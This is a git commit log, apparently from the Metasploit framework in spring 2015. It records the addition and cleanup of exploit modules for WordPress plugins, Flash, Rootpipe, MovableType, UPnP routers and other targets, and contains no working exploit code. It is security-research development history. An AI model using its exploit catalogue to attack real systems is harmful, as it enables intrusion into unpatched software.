MIPSBE vs MIPS
2015-05-28 18:50:48 +02:00
jvazquez-r7
e9714bfc82
Solve conflicts
2015-05-27 23:22:00 -05:00
Spencer McIntyre
24b4dacec5
Land #5408 , @g0tmi1k fixes verbiage and whitespace
2015-05-27 21:02:02 -04:00
wchen-r7
bcdae5fa1a
Forgot to add the datastore option
2015-05-27 18:12:38 -05:00
wchen-r7
4f0e908c8b
Never mind, Vista doesn't have powershell.
2015-05-27 18:08:58 -05:00
wchen-r7
d43706b65e
It doesn't look like Vista shows the powershell prompt
2015-05-27 18:04:35 -05:00
wchen-r7
53774fed56
Be more strict with Win 7 for MS14-064
...
The Powershell prompt can cause BAP to hang so we need to be more
strict about that.
2015-05-27 18:01:40 -05:00
jvazquez-r7
e5d42850c1
Add support for Linux to CVE-2015-0336
2015-05-27 17:05:10 -05:00
Tod Beardsley
95b5ff6bea
Minor fixups on recent modules.
...
Edited modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
first landed in #5301 , @m-1-k-3's aux module to extract passwords from
Netgear soap interfaces
Edited modules/auxiliary/scanner/http/influxdb_enum.rb first landed in
Edited modules/auxiliary/scanner/http/title.rb first landed in #5333 ,
HTML Title Grabber
Edited modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
first landed in #5401 , multi-platform CVE-2015-0311 - Flash uncompress()
UAF
Edited modules/exploits/unix/webapp/wp_revslider_upload_execute.rb first
landed in #5290 , Wordpress RevSlider Module
2015-05-26 17:00:10 -05:00
wchen-r7
60cdf71e6c
Merge branch 'upstream-master' into bapv2
2015-05-26 15:56:48 -05:00
wchen-r7
a0e0e3d360
Description
2015-05-25 17:24:41 -05:00
Michael Messner
43f505b462
fix contact details
2015-05-25 19:31:50 +02:00
jvazquez-r7
f953dc08d9
Land #5280 , @m-1-k-3's support for Airties devices to miniupnpd_soap_bof
2015-05-24 15:17:38 -05:00
Michael Messner
10baf1ebb6
echo stager
2015-05-23 15:50:35 +02:00
wchen-r7
60b0be8e3f
Fix a lot of bugs
2015-05-23 01:59:29 -05:00
jvazquez-r7
5bceeb4f27
Land #5349 , @h0ng10's module for CVE-2015-2219 Lenovo System Update Local Privilege Escalation
2015-05-22 17:14:20 -05:00
wchen-r7
9600f6a30a
rm deprecated exploit
2015-05-22 17:14:08 -05:00
wchen-r7
6de75ffd9f
Merge branch 'upstream-master' into bapv2
2015-05-22 17:11:03 -05:00
wchen-r7
eb5aadfb4e
Land #5401 , multi-platform CVE-2015-0311 - Flash uncompress() UAF
2015-05-22 16:50:13 -05:00
jvazquez-r7
3aa1ffb4f5
Do minor code cleanup
2015-05-22 16:20:36 -05:00
wchen-r7
2bb6f390c0
Add session limiter and fix a race bug in notes removal
2015-05-22 12:22:41 -05:00
jvazquez-r7
03b70e3714
Land #5388 , @wchen-r7's fixes #5373 by adding info to BrowserRequirements
2015-05-22 10:21:59 -05:00
jvazquez-r7
6da94b1dd5
Deprecate windows module
2015-05-21 15:01:41 -05:00
jvazquez-r7
b9f9647ab1
Use all the BES power
2015-05-21 14:06:41 -05:00
wchen-r7
6e8ee2f3ba
Add whitelist feature
2015-05-21 00:05:14 -05:00
jvazquez-r7
aa919da84d
Add the multiplatform exploit
2015-05-20 18:57:59 -05:00
wchen-r7
2cadd5e658
Resolve #5373 , Add ActiveX info in BrowserRequirements
...
Resolve #5373
2015-05-20 16:34:09 -05:00
OJ
44f8cf4124
Add more size to stagers, adjust psexec payloads
...
This psexec payload size should be evaluated to make sure I'm not doing
anything stupid. I can't see a reason why increasing these sizes would
be bad. They seem to work fine.
2015-05-20 17:07:56 +10:00
OJ
a93565b5d1
Add 'Payload' section with 'Size' to psexec_psh
...
This missing parameter was causing the payload 'Size' to come through to
the encoders as `nil`. This meant that all the stagers that were
looking at the payload sizes were being told there was no size. In the
case of the meterpreter payloads, this was causing issues with the proxy
settings because the proxy configuration detail isn't added to the
payload unless there's enough space.
This fix adds a default size of 2048 (the same as the plain psexec
module). This makes the proxy settings work as expected.
2015-05-19 22:11:29 +10:00
wchen-r7
89be3fc1f2
Do global requirement comparison in BAP
2015-05-18 16:27:18 -05:00
Hans-Martin Münch (h0ng10)
d99eedb1e4
Adding begin...ensure block
2015-05-17 20:48:11 +02:00
Hans-Martin Münch (h0ng10)
acb053a2a7
CloseHandle cleanup
2015-05-17 20:39:10 +02:00
jvazquez-r7
2882374582
Land #5276 , @lanjelot fixes #4243 and improves java_jdwp_debugger
2015-05-15 11:12:10 -05:00
jvazquez-r7
a46975f1f0
Fix read_reply to use get_once correctly
2015-05-15 11:11:25 -05:00
Hans-Martin Münch (h0ng10)
e075495a5b
string concatenation, clear \ handling
2015-05-15 06:51:42 +02:00
Hans-Martin Münch (h0ng10)
94d39c5c75
remove hard coded pipe name
2015-05-15 06:35:55 +02:00
Hans-Martin Münch (h0ng10)
bb4f5da6d9
replace client.sys.config.getenv with get_env
2015-05-15 06:33:57 +02:00
wchen-r7
8bcdd08f34
Some basic code in place for real-time exploit list generation
2015-05-14 19:09:38 -05:00
Hans-Martin Münch (h0ng10)
bba261a1cf
Initial version
2015-05-15 00:36:03 +02:00
wchen-r7
1a8ab91ce3
Configurable max exploits
2015-05-13 16:23:22 -05:00
wchen-r7
7617217eff
Add ability to exclude
2015-05-13 15:55:19 -05:00
jvazquez-r7
0fb21af247
Verify deletion at on_new_session moment
2015-05-11 18:56:18 -05:00
wchen-r7
30b1c508f1
javascript portion
2015-05-10 16:50:32 -05:00
William Vu
eeb87a3489
Polish up module
2015-05-09 14:33:41 -05:00
HD Moore
fe907dfe98
Fix the disclosure date
2015-05-09 10:44:28 -05:00
jvazquez-r7
cb51bcc776
Land #5147 , @lightsey's exploit for CVE-2015-1592 MovableType deserialization
2015-05-09 01:56:38 -05:00
jvazquez-r7
89bc405c54
Do minor code cleanup
2015-05-09 01:54:05 -05:00
wchen-r7
8e86a92210
Update
2015-05-08 00:25:34 -05:00
William Vu
71518ef613
Land #5303 , metasploit-payloads Java binaries
2015-05-07 22:39:54 -05:00
William Vu
2f2169af90
Use single quotes consistently
2015-05-07 22:39:36 -05:00
wchen-r7
95f087ffd3
Some progress
2015-05-07 19:26:38 -05:00
jvazquez-r7
51bb4b5a9b
Add module for CVE-2015-0359
2015-05-07 17:00:00 -05:00
Brent Cook
a066105a86
prefer reading directly with MetasploitPayloads where possible
2015-05-07 16:59:02 -05:00
William Vu
134a674ef3
Land #5312 , @todb-r7's release fixes
2015-05-07 15:34:31 -05:00
Christian Mehlmauer
1469a151ad
Land #5290 , Wordpress RevSlider Module
2015-05-07 22:15:56 +02:00
Tod Beardsley
f423306b6f
Various post-commit fixups
...
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150 , @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192 , @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016 ,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101 , Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158 , OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159 , WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131 , WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649 ,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo ''; done"
```
So that's kind of fun.
2015-05-06 11:39:15 -05:00
William Vu
b8c7161819
Fix up NameError'd payload_exe
2015-05-06 11:34:05 -05:00
William Vu
59ffe5d98f
Land #5306 , payload_exe NameError fix
2015-05-06 11:29:29 -05:00
wchen-r7
4b0f54f0aa
Land #5305 , CVE-2015-0336 Flash NetConnection Type Confusion
2015-05-06 11:26:22 -05:00
wchen-r7
97807e09ca
Land #5125 , Group Policy startup exploit
2015-05-06 11:17:01 -05:00
wchen-r7
5b57e4e9ca
Add info about the waiting time
2015-05-06 11:15:11 -05:00
Tom Sellers
94d1905fd6
Added WPVDB reference
...
Added a link to the new WPVDB article 7540 that @FireFart provided.
2015-05-06 05:41:02 -05:00
Tom Sellers
c293066198
Leverage check_version_from_custom_file in PR #5292
...
Change the 'check' code to leverage check_version_from_custom_file added to wordpress/version.rb by @FireFart in PR #5292
2015-05-06 05:41:02 -05:00
Tom Sellers
18697d8d02
Fixed the following based on feedback from @FireFart ( Thanks! )
...
- Adjusted references section
- Corrected call to normalize_uri
- Removed unnecessary require for rex/zip
2015-05-06 05:41:02 -05:00
Tom Sellers
8cb18f8afe
Initial commit of code
2015-05-06 05:41:02 -05:00
Sam Roth
5cb8b9a20a
Fix #5304
2015-05-05 22:25:06 -04:00
jvazquez-r7
582919acac
Add module for CVE-2015-0336
2015-05-05 17:25:19 -05:00
Brent Cook
a0c806c213
Update java meterpreter and payload references to use metasploit-payloads
2015-05-05 15:01:00 -05:00
Darius Freamon
c988447c18
title enhancement, OSVDB ref
...
touch up title and add OSVDB reference
2015-05-05 13:21:36 -06:00
m-1-k-3
c8123c147f
upnp vs hnap
2015-05-05 20:57:05 +02:00
Christian Mehlmauer
73f7885eea
add comment
2015-05-29 23:08:55 +02:00
jvazquez-r7
b95be1b25f
Support information to include logon scripts
2015-05-04 15:49:19 -05:00
Darius Freamon
dc42a3ee1a
add OSVDB ref
...
add OSVDB ref
2015-05-04 14:27:44 -06:00
m-1-k-3
c7e05448e7
various MIPS vs MIPSBE fixes
2015-05-04 12:55:21 +02:00
William Vu
67a23f2c74
Land #5296 , info hash product name fix
2015-05-03 14:36:25 -05:00
John Lightsey
4bfb9262e6
Add exploit module for MovableType CVE-2015-1592
...
This module targets the deserialization of untrusted Storable data in
MovableType before 5.2.12 and 6.0.7. The destructive attack will
function on most installations, but will leave the webapp corrupted.
The non-destructive attack will only function on servers that have the
Object::MultiType (uncommon) and DateTime (common) Perl modules
installed in addition to MovableType.
2015-05-03 14:18:01 -05:00
Darius Freamon
a5c10b7f10
Fix product name
...
Product name missing a letter in two locations
2015-05-03 13:11:22 -06:00
m-1-k-3
53043dcbbc
make msftidy happy
2015-05-03 18:14:51 +02:00
m-1-k-3
6fbce56a52
realtek upnp command injection
2015-05-03 18:09:22 +02:00
joev
db999d2c62
Remove ff 31-34 exploit from autopwn, requires interaction.
2015-05-03 10:42:21 -05:00
jvazquez-r7
1bc6822811
Delete Airties module
2015-05-22 11:57:45 -05:00
jvazquez-r7
70d0bb1b1a
Merge Airties target inside miniupnpd_soap_bof
2015-05-22 11:57:19 -05:00
jvazquez-r7
a531ad9ec2
Land #5096 , @pedrib's exploit for Novell ZCM CVE-2015-0779
2015-05-01 14:35:28 -05:00
jvazquez-r7
0ff33572a7
Fix waiting loop
2015-05-01 14:34:43 -05:00
jvazquez-r7
645f239d94
Change module filename
2015-05-01 14:18:34 -05:00
jvazquez-r7
11a3f59b0b
Return false if there isn't a positive answer
2015-05-01 14:06:57 -05:00
jvazquez-r7
093c2e3ace
Do minor style cleanup
2015-05-01 13:56:48 -05:00
jvazquez-r7
d38adef5cc
Make TOMCAT_PATH optional
2015-05-01 13:54:39 -05:00
jvazquez-r7
d2a7d83f71
Avoid long sleep times
2015-05-01 13:51:52 -05:00
jvazquez-r7
8fcf0c558d
Use single quotes
2015-05-01 13:20:27 -05:00
wchen-r7
08b5f71f99
More options
2015-04-30 19:09:08 -05:00
wchen-r7
5ae06310b6
Do some option handling
2015-04-30 18:59:44 -05:00
Darius Freamon
aa59b3acc6
title enhancement, description touch-up
...
Expanded title to be more precise and standardized use of vendor name
2015-04-30 17:23:15 -06:00
wchen-r7
89d026c900
Fix merge conflict
2015-04-30 12:33:45 -05:00
lanjelot
5ab9f01eee
Use byte[] so it works even if Base64 unavailable
2015-04-30 12:46:14 +10:00
lanjelot
15bb4d1ea4
Fix #4243 , regression introduced by commit 6e80481384
2015-04-30 12:42:39 +10:00
wchen-r7
ca32db3e23
Merge branch 'upstream-master' into BAPv2
2015-04-29 18:53:37 -05:00
jvazquez-r7
d773f85dca
Add reference to malware
2015-04-29 17:53:29 -05:00
jvazquez-r7
dbba466b5b
Add module for CVE-2014-8440
2015-04-29 17:52:04 -05:00
William Vu
5defb50252
Fix #5267 , references fixes
2015-04-29 14:21:23 -05:00
William Vu
a4531e62a0
Clean up references
2015-04-29 14:21:08 -05:00
William Vu
b2d08251e4
Move reference
2015-04-29 14:18:45 -05:00
William Vu
fd567195e3
Fix punctuation and missing comma
2015-04-29 14:12:44 -05:00
Darius Freamon
5f0736fa4c
enhance title and description, add OSVDB reference, standardized JBoss
2015-04-29 11:39:40 -06:00
wchen-r7
65b7659d27
Some progress
2015-04-29 01:01:36 -05:00
wchen-r7
43492b7c67
Some progress
2015-04-28 18:17:32 -05:00
Darius Freamon
c01fc829ab
Title enhancement, OSVDB refs
2015-04-28 15:56:34 -06:00
m-1-k-3
d8b8017e0b
remove debugging
2015-04-27 06:36:34 +02:00
m-1-k-3
8db88994ac
fingerprint, title
2015-04-27 06:34:46 +02:00
m-1-k-3
285d767e20
initial commit of UPnP exploit for Airties devices
2015-04-27 05:34:30 +02:00
Roberto Soares
b537c8ae2c
Changed fail_with output.
2015-04-26 01:28:55 -03:00
Roberto Soares
a4b4d7cf6a
Add WordPress Front-end Editor File Upload Vuln
2015-04-25 22:00:05 -03:00
Brent Cook
ff96101dba
Land #5218 , fix #3816 , remove print_debug / DEBUG
2015-04-24 13:41:07 -05:00
jvazquez-r7
7167dc1147
Land #5243 , @espreto's WordPress WPshop eCommerce File Upload exploit
2015-04-24 11:30:28 -05:00
jvazquez-r7
558103b25d
Do code cleanup
2015-04-24 11:30:08 -05:00
jvazquez-r7
8a8d9a26f4
Do code cleanup
2015-04-24 10:47:46 -05:00
jvazquez-r7
b5223912cb
Fix check method
2015-04-24 10:41:41 -05:00
Roberto Soares
c9b4a272e3
Changed fail_with output.
2015-04-24 12:16:23 -03:00
Roberto Soares
e14c6af194
Removed double 'Calling payload'.
2015-04-24 06:26:04 -03:00
Roberto Soares
01efc97c4a
Add WordPress WPshop eCommerce File Upload.
2015-04-24 06:21:49 -03:00
Roberto Soares
5bf4c9187a
Removed double "Calling payload..."
2015-04-23 03:41:34 -03:00
Roberto Soares
844f768eee
Add WordPress InBoundio Marketing File Upload
2015-04-23 03:32:17 -03:00
m-1-k-3
f5b0a7e082
include rop gadget description
2015-04-23 00:11:02 +02:00
m-1-k-3
1ec0e09a43
msftidy
2015-04-22 10:32:47 +02:00
m-1-k-3
58099d0469
airties login bof module
2015-04-22 10:21:58 +02:00
xistence
92c91c76f7
Proftpd 1.3.5 Mod_Copy Command Execution
2015-04-22 01:41:16 -04:00
jvazquez-r7
3f40342ac5
Fix sock_sendpage
2015-04-21 14:17:19 -05:00
jvazquez-r7
ab94f15a60
Take care of modules using the 'DEBUG' option
2015-04-21 12:13:40 -05:00
jvazquez-r7
4224008709
Delete print_debug/vprint_debug
2015-04-21 11:14:03 -05:00
jvazquez-r7
4f59abe842
Land #5203 , @Meatballs1 fixes #5199 by using the correct namespace
...
* Fixes web_delivery
2015-04-20 11:20:48 -05:00
Meatballs
eb1c01417a
Bogus :
2015-04-20 11:00:26 +01:00
Meatballs
aa4f913800
Resolves #5199
...
Fix Powershell namespace in web_delivery module
2015-04-20 09:37:42 +01:00
Christian Mehlmauer
a60fe4af8e
Land #5201 , Change module wording to conform with other WP modules
2015-04-20 10:07:05 +02:00
aushack
1a32cf7fc0
Change module wording to conform with other WP modules.
2015-04-20 16:48:35 +10:00
Christian Mehlmauer
a5583debdc
Land #5131 , WordPress Slideshow Upload
2015-04-19 23:12:26 +02:00
Roberto Soares
c1a1143377
Remove line in description and output line in fail_with
2015-04-18 15:38:42 -03:00
Michael Messner
b991dec0f9
Dlink UPnP SOAP-Header Injection
2015-04-17 22:54:32 +02:00
wchen-r7
4f903a604c
Fix #5103 , Revert unwanted URI encoding
...
Fix #5103 . By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
2015-04-17 13:59:49 -05:00
Christian Mehlmauer
bba0927c7e
Land #5163 , WordPress Reflex Gallery Plugin File Upload
2015-04-17 11:26:34 +02:00
wchen-r7
3927024f79
Land #5154 , CVE-2015-0556 (Flash copyPixelsToByteArray int overflow)
...
sage aborts
2015-04-16 21:21:09 -05:00
Christian Mehlmauer
153344a1dd
fix Unkown typo
2015-04-16 23:59:28 +02:00
Roberto Soares
33cf2f1578
Added Failure:: symbol to fail_with
2015-04-16 17:40:25 -03:00
Roberto Soares
2138325129
Add Failure:: symbol to fail_with
2015-04-16 17:15:24 -03:00
Christian Mehlmauer
352e170624
more failure reasons
2015-04-16 22:04:11 +02:00
Christian Mehlmauer
8c5890d506
more fixes
2015-04-16 21:56:42 +02:00
Christian Mehlmauer
ba6548db75
be consistent about naming
2015-04-16 21:44:56 +02:00
Christian Mehlmauer
b4b8ac0849
moar fail_with's
2015-04-16 21:26:37 +02:00
Christian Mehlmauer
a193ae42b0
moar fail_with's
2015-04-16 21:25:05 +02:00
Christian Mehlmauer
4dc402fd3c
moar fail_with's
2015-04-16 21:16:52 +02:00
Christian Mehlmauer
0e186fa617
first fail_with fixes
2015-04-16 21:08:33 +02:00
William Vu
f0d6735332
Land #5165 , version number correction
2015-04-16 12:10:12 -05:00
William Vu
26f2b350d2
Land #5168 , more fail_with fixes
2015-04-16 12:04:55 -05:00
sinn3r
904339f0d7
Fix #5130 , Correct use of fail_with in wp_worktheflow_upload.rb
2015-04-16 10:32:50 -05:00
sinn3r
5c98270f4d
Fix #5137 - Correct use of fail_with
2015-04-16 09:57:02 -05:00
Christian Mehlmauer
418d8586a5
Land #5137 (again), WordPress N-Media Website File Upload
2015-04-16 16:24:41 +02:00
Christian Mehlmauer
7f79acb996
Land #5137 , WordPress N-Media Website File Upload
2015-04-16 16:17:20 +02:00
Roberto Soares
517ad54617
Fix the correct version in check.
2015-04-16 10:56:43 -03:00
Roberto Soares
95310dbe4f
Fix 'if' condition.
2015-04-16 10:51:36 -03:00
Roberto Soares
626a9f0508
Fix the correct version in check.
2015-04-16 10:46:08 -03:00
Roberto Soares
6ef074cd28
Fix the correct version in check
2015-04-16 10:34:34 -03:00
Christian Mehlmauer
d9f4c7548f
Land #5136 , WordPress Creative Contact Form upload
2015-04-16 15:17:14 +02:00
Christian Mehlmauer
84c74b8d42
use correct version number
2015-04-16 15:01:54 +02:00
Roberto Soares
ee8dc49a25
Fix wrong version in check.
2015-04-16 09:45:18 -03:00
Roberto Soares
e16cc6fa82
Fix the correct version in check.
2015-04-16 09:38:42 -03:00
Christian Mehlmauer
7dde7f6f7c
Land #5130 , WordPress WorkTheFlow Upload
2015-04-16 14:06:37 +02:00
Roberto Soares
dc7f161339
Add author, EDB, OSVDB and WPVDB.
2015-04-16 08:56:33 -03:00
Roberto Soares
1112a3b0ae
Add WordPress Reflex Gallery Plugin File Upload
2015-04-16 08:40:51 -03:00
Roberto Soares
4aa4f83372
Removed timeout 2.
2015-04-16 05:37:11 -03:00
Roberto Soares
39556c10c7
Rewrote check method.
2015-04-16 05:36:20 -03:00
Roberto Soares
ace316a54f
Added WPVDB and EDB references.
2015-04-16 05:29:21 -03:00
Roberto Soares
10c218319a
Rewrote response condition.
2015-04-16 05:26:48 -03:00
Roberto Soares
5cb9b1a44c
Removed timeout 2.
2015-04-16 05:21:59 -03:00
Roberto Soares
0e1b173d15
Renamed USER/PASSWORD to WP_USER/WP_PASSWORD.
2015-04-16 05:11:56 -03:00
Roberto Soares
13ded8abe7
Added WPVDB.
2015-04-16 05:08:45 -03:00
Roberto Soares
64923ffdc2
Fixed plugin name in check method
2015-04-16 05:06:36 -03:00
Roberto Soares
e9212c4d6b
wordpress_url_admin_ajax instead of wordpress_url_backend
2015-04-16 04:53:05 -03:00
Roberto Soares
81d898fd7e
Rewrote check code.
2015-04-16 04:51:40 -03:00
Roberto Soares
aeb0484889
Removed timeout 2.
2015-04-16 04:48:00 -03:00
Roberto Soares
e6e9c173e3
Rewrote res conditions.
2015-04-16 04:43:34 -03:00
Roberto Soares
d11db4edc7
Rewrote check code.
2015-04-16 04:37:30 -03:00
Roberto Soares
f13d31c7c2
Added WPVDB.
2015-04-16 04:31:23 -03:00
Roberto Soares
cccda4e851
Removed unnecessary line.
2015-04-16 04:27:15 -03:00
Roberto Soares
d3a6de761d
Removed timeout 2.
2015-04-16 04:09:02 -03:00
William Vu
01625e3bba
Land #5148 , DRY BSD/OS X shellcode
...
Also fix a semi-regression in the Rootpipe exploit.
2015-04-16 02:08:18 -05:00
William Vu
13da15e434
Add default PAYLOAD again
...
PrependSetreuid doesn't work with generic/shell_reverse_tcp.
2015-04-16 02:07:02 -05:00
Roberto Soares
1249f29ee8
Add JSON::ParserError exception handler.
2015-04-16 04:03:54 -03:00
jvazquez-r7
c1753672bf
Delete file_contents initialization
2015-04-15 17:58:32 -05:00
jvazquez-r7
28fac60c81
Add module for CVE-2015-0556
2015-04-15 14:08:16 -05:00
jvazquez-r7
ef6bf54e2f
Fix metadata
2015-04-15 09:22:59 -05:00
jvazquez-r7
1da6b32df7
Land #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
...
* ncc service ping.cpp command injection
2015-04-15 09:17:10 -05:00
jvazquez-r7
6019bbe0d2
Add ranking comment
2015-04-15 09:12:03 -05:00
jvazquez-r7
ad465c4d5b
Do code cleanup
2015-04-15 09:10:18 -05:00
sinn3r
b5335ab266
Some progress, mostly documentation
2015-04-14 19:03:08 -05:00
sinn3r
aca93cc86e
Add missing Rank
2015-04-14 13:33:37 -05:00
sinn3r
6c9cc7c725
Some progress
2015-04-14 13:30:34 -05:00
sinn3r
4486831ba3
Module loading portion
2015-04-14 01:33:02 -05:00
William Vu
e114c85044
Land #5127 , x64 OS X prepend stubs 'n' stuff
2015-04-14 01:25:39 -05:00
Roberto Soares
a09e643a71
Add author, URL, WPVDB and disclosure date.
2015-04-13 22:54:05 -03:00
Roberto Soares
271a81778e
Add Module WP N-Media Website Contact Form Upload
2015-04-13 22:48:34 -03:00
Roberto Soares
7f10fb5bf0
Fix disclosure date
2015-04-13 18:53:20 -03:00
Roberto Soares
e94ca0bdd1
Add EDB, OSVDB and author.
2015-04-13 18:42:17 -03:00
Roberto Soares
d5d975c450
Add Module WordPress Creative Contact Form Upload
2015-04-13 18:38:43 -03:00
William Vu
e324819feb
Add Privileged to info hash
...
Also remove default payload. Was set for CMD.
2015-04-13 15:23:30 -05:00
Tod Beardsley
bd3b6514fa
Dubbed. Whump whump.
2015-04-13 10:52:32 -05:00
Tod Beardsley
d87483b28d
Squashed commit of the following:
...
commit 49f480af8b9d27e676c02006ae8873a119e1aae6
Author: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon Apr 13 10:42:13 2015 -0500
Fix funny punctuation on rootpipe exploit title
See #5119
commit 0b439671efd6dabcf1a69fd0b089c28badf5ccff
Author: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon Apr 13 10:37:39 2015 -0500
Fix vendor caps
Trusting the github repo README at
https://github.com/embedthis/goahead
See #5101
2015-04-13 10:46:47 -05:00
Roberto Soares
7b57496501
Fix typo and add email addr.
2015-04-13 04:12:32 -03:00
Roberto Soares
abee3f17c4
Add author, CVE and EDB references
2015-04-13 04:08:34 -03:00
Roberto Soares
58c4042321
Add Module WP Slideshow Gallery Shell Upload
2015-04-13 03:56:59 -03:00
Roberto Soares
2d1f8c510e
Add author and references
2015-04-12 21:21:49 -03:00
Roberto Soares
9f06cee53d
Add Module WordPress WorkTheFlow Shell Upload
2015-04-12 21:09:44 -03:00
joev
c132a3fb0a
Fix OSX prepends and implement x64 setreuid.
2015-04-11 20:04:21 -05:00
jvazquez-r7
656abac13c
Use keyword arguments
2015-04-10 18:03:45 -05:00
jvazquez-r7
1720d4cd83
Introduce get_file_contents
2015-04-10 17:34:00 -05:00
jvazquez-r7
ca6a5cad17
support changing files
2015-04-10 16:53:12 -05:00
jvazquez-r7
b2e17a61a9
Fix disclosure date
2015-04-10 13:09:24 -05:00
jvazquez-r7
ab944b1897
Add module to exploit dangerous group policy startup scripts
2015-04-10 13:01:50 -05:00
joev
3313dac30f
Land #5119 , @wvu's addition of the OSX rootpipe privesc exploit.
...
orts
borts
2015-04-10 12:38:25 -05:00
sinn3r
4419c1c728
Land #5120 , Adobe Flash Player casi32 Integer Overflow
2015-04-10 12:18:11 -05:00
William Vu
fc814a17ae
Add admin check
...
Also break out version check.
2015-04-10 11:24:49 -05:00
William Vu
41885133d8
Refactor and clean
...
Finally breaking free of some stubborn old habits. :)
2015-04-10 11:22:27 -05:00
William Vu
a7601c1b9a
Use zsh to avoid dropping privs
...
Also add some configurable options.
2015-04-10 11:22:00 -05:00
William Vu
4cc6ac6eaa
Clarify vulnerable versions
2015-04-10 11:22:00 -05:00
William Vu
c4b7b32745
Add Rootpipe exploit
2015-04-10 11:22:00 -05:00
Jon Cave
c6f062d49e
Ensure that local variable `upload_path` is defined
...
Merge `upload_payload` and `parse_upload_response` so that the
`upload_path` variable is defined for use in error messages in the event
of failure.
2015-04-10 10:58:20 +01:00
jvazquez-r7
91f5d0af5a
Add module for CVE-2014-0569
...
* Adobe flash, Integer overflow on casi32
2015-04-09 19:37:26 -05:00
Pedro Ribeiro
4808d61af3
Add OSVDB id and full disclosure URL
2015-04-09 16:32:22 +01:00
Brent Cook
e03f2df691
Land #5002 , RMI/JMX improvements
2015-04-08 15:23:29 -05:00
Pedro Ribeiro
cf8b92b747
Create zcm_file_upload.rb
2015-04-07 16:05:51 +01:00
William Vu
7a2d3f5ebd
Land #5082 , firefox_proxy_prototype autopwn_info
2015-04-06 13:36:03 -05:00
William Vu
e1af495d21
Add extra release fixes
2015-04-06 13:08:40 -05:00
Tod Beardsley
b62011121b
Minor word choice fix on Solarwinds exploit
...
Removing the second person pronoun usage.
[See #5050 ]
2015-04-06 12:40:22 -05:00